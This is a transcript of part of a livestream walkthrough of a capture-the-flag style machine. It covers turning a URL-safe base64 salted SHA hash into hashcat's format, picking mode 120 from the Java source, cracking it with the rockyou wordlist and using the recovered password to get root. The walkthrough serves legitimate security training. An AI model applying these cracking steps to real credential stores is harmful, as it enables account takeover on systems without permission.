actually convert the base64 part to the hex string that is needed by hashcat. So yeah, I agree with Leonard, and my opinion is that this is not a very easy part, and you actually need to have, I guess, hints from somebody who actually knows how to do it, or go to a meetup and talk to people. So let's close all this stuff. We don't need this anymore. We don't need this. This go away, go away, and go away. Go away. Go away. I don't need anything anymore. It is good. We're in the home stretch. So let me plug my basics for that does both. Awesome. Awesome. Nice. Beautiful. So Hashcat, a tool that is used by connoisseurs of the good life of cracking passwords, has I don't need that yet. Has something for SHA stuff. SHA stuff, SHA encoded passwords. We can find out how to do them. We have a salt, so we could also say, give me SHAs and give me everything with a salt. Then we don't have a lot of options. There's, of course, a lot of variations, but the thing that you will notice when you look through the source code, that it is either the 110, the password with a salt, or a salt with a password. Either the salt is used in front of it or in the back of it. So that is quite interesting. How do we know that? By looking at the hash script file, we know that the salt is put behind. So 120 will be the one that actually gives us the correct result. Beautiful. Let's give this a try. So we have this base64 thing, and last run through that I did, I actually messed it up. So big chance that I mess it up now. Let's create a hash file, and it works by doing a colon and then passing the hash, the salt along that is used to salt the stuff. So yeah, colon D, it will actually, the ligature will say, hey, that's a smiley. There you go. So let's pass that. And then we can do a hashcat minus M120 minus A stuff. And then the 110, is it 110? Oh, let's see. User share word lists, RockQ. If you don't have RockQ, highly recommend. It's one of the ones generally used. But first it needs the hash. I believe the hash comes first and then the word list. It is a beautiful thing. We will quickly find out if it's 110 or 120. I thought it was 120, but we will give both a try. This one will actually work. It is cached already. Oh, can I clean it? Why? Because I want to show you how powerful it is. Hashcat clean found hashes. Delete hash results. How do we do that? The pot file hashcat rm hash. Would it be the config directory? Hash. Hashcat. Kernels. No, these are kernels. Config hashcat. No. Where is the file that needs to be deleted? Many thanks. Is there just a remove? That would be funny. Hashcat -8 grep remove. Removal of hashes once they're cracked. remove, hash file empty or corrupts. All right, I did something horrible. Did not save it. Is that what I did? Oh, I removed it. It removes the hash from the hash thing. Okay. Anyway, run 120 or 110. I think 110 also has the same result. We'll see. Force. Hashcat minus h. Now we need to know. Grab results. Force. Ignore warnings. Remove. Pot. Specific path to a pot file. Okay. Apparently, Hashcat stores it in a pot file. So if we tell it pot file minus disable. Yeah, there we go. Okay, that does something. Let's see. Leonard says, I think there's force option. Well, we can just disable the pot file and that will work. Thanks for the part where we need to connect it. Is where I got lost. Secure heads. There is a thingy up above. So it should try it in the relaxation of your own home. Yeah, correct. It was 120. I was right. Yes. And now we need to actually tell it to go. Does it actually tell it here? The passwords? No. It says that it's cracked, but it would. Oh, it says here. There we go. Monkey business. We could have guessed it. Monkey business, of course. So monkey business is the hash that we actually need to look into. Can Control C this to go away. And so if we do a soup and we do monkey business, we are in business, and we have root. We can have the root text, and it works. This machine, I'm not not highly convinced about it, but there's some very interesting things here. Java is still a very good thing to know. There is a lot of scanning source code, the Java stuff, to figure out why the hash is not what you expect. I don't think that anybody who did not look at the source code can crack the hash, simply because the URL safe base64. Rene knows it, apparently. I now know it, but I think if you ask a group of people, everybody will think there's only one version of base64. So that is quite interesting. That was something to learn about. And then from there, the hashcat, it actually was quite right. Leonard, yeah, the first assault, then the pass. Let's take a look at the hash crypt file again. Hash crypt. For hashcat, it first has the crypted thingy, and then the salt, and then the algorithm determines in which way they are used. So I think it's called crypt bytes. Let's see. Crypt bytes, blah, blah, blah. And this is the appending of stuff, but there should be the hash type. It first does the salt, and then it does the bytes of the password. So 120 is salt first, then the bytes, and that gets executed. Yeah, true, exactly. So this part determines, if we look at hashcat, at -8 grab 120. It says salt first, then the password. and so you can deduce it from there. But again, this is not easy. You need to actually have experience in Java. You need to learn and know how to read source code. And I'm willing to bet that if somebody has grabbed root without doing these steps, um, yeah, it is either an unintended route, or there's another possibility on this machine, because you need so much information beforehand in order to do this. So, yeah, so that was this beautiful little box. We did it in a little under 2 hours, so that is very cool. Um, on my enjoyment level scale, it was, yeah, a little bit of a meh. It was the easy parts were the first parts were easy. This was quite convoluted. Threw me back to the Java world, which was quite nice. So yeah, I read some hint that there was a S8 somewhere for the password and the salt. Oh, uh, let's see. See if there's any interesting files. I would maybe this these parts, the opt office Docker part, maybe. Um, the thing with the shared machines, of course, is that it's shared machines, so people can put stuff in there that they discover, and then that you never know this, right? Docker entry points. I do know that there's an XML file that has a sample SHA thingy in it, I believe. It's also here because I found that one as well. SHA colon D colon, something like that. Oh, SHA one. Oh, not this one. I thought that was a XML file with some configuration. But if you look at the write-ups, they really don't know how they solved it either. No, no, and I think that is due to this one guy here or person. I don't know if it's a guy or a girl. Business that did this SHA one cracker. They have this README, and they jump from having the SHA-1 or the SHA as we have. They change it, but if you apply this methodology on our input, so you do the SHA, you change to SHA-1, and you put a equal sign behind it, it will actually work. And I go like, how would I even know this, right? So this, I think a lot of people use this one and just change stuff until it works. But yeah, yeah. So with that, I will close out the stream. I hope you enjoyed it. Let's switch to this. I hope you enjoyed it. Yeah, especially the latter part. It is quite hard. So there's some people saying, kind of next level stuff for me. The first part, the content discovery, finding off-biz, finding the version, finding the CVE, and running the CVE exploit, they are very easily done. So we have the segment left called Cookie's Choice. We will keep calling it Cookie's Choice, even though Cookie is not here. But yeah, we have some giveaways. So yay! See you all later. Bye bye. See you in Discord. And if you only follow the live stream, see you next month. Bye bye.